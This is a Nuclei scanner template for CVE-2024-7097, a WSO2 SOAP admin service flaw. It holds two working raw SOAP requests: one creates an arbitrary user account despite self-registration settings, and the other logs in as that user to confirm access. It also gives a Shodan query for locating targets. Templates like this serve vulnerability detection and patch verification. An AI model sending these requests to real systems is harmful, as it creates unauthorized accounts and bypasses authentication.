漏洞描述
The SOAP admin service in WSO2 products has a security vulnerability that allows the creation of new user accounts regardless of the self-registration configuration settings.
id: CVE-2024-7097
info:
name: WSO2 User Registration - Arbitrary Account Creation
author: iamnoooob,rootxharsh,pdresearch
severity: medium
description: |
The SOAP admin service in WSO2 products has a security vulnerability that allows the creation of new user accounts regardless of the self-registration configuration settings.
reference:
- https://sec.vnpt.vn/2025/01/canh-bao-lo-hong-nghiem-trong-tren-nen-tang-xac-thuc-tap-trung-wso2-anh-huong-den-nhieu-co-quan-to-chuc-bo-ban-nganh/
- https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2024/WSO2-2024-3574/
classification:
epss-score: 0.00391
epss-percentile: 0.59448
metadata:
verified: true
max-request: 2
shodan-query: "WSO2 Carbon Server"
tags: cve,cve2024,wso2,intrusive,auth-bypass,vkev
variables:
username: "{{randstr_1}}"
password: "{{randstr_2}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /services/UserRegistrationAdminService.UserRegistrationAdminServiceHttpsSoap11Endpoint/ HTTP/1.1
Host: {{Hostname}}
SOAPAction: "urn:addUser"
Content-Type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsd="http://org.apache.axis2/xsd">
<soapenv:Header/>
<soapenv:Body>
<xsd:addUser>
<xsd:user>
<xsd:userName>{{username}}</xsd:userName>
<xsd:password>{{password}}</xsd:password>
</xsd:user>
</xsd:addUser>
</soapenv:Body>
</soapenv:Envelope>
matchers:
- type: status
status:
- 202
internal: true
- raw:
- |
POST /services/AuthenticationAdmin HTTP/1.1
Host: {{Hostname}}
SOAPAction: ""
Content-Type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:aut="http://authentication.services.core.carbon.wso2.org">
<soapenv:Header/>
<soapenv:Body>
<aut:login>
<aut:username>{{username}}</aut:username>
<aut:password>{{password}}</aut:password>
</aut:login>
</soapenv:Body>
</soapenv:Envelope>
matchers:
- type: word
words:
- "loginResponse"
- "<ns:return>true</ns:return>"
condition: and
# digest: 4a0a00473045022100decbb867a0f53f5be565ad425e45a72cfb9639ddba93296163d36b51fc69038502207165b5e8a64efd5746f0384a1e5a1c73cd71c7d305e687620e4fe65097942fbb:922c64590222798bb761d5b6d8e72950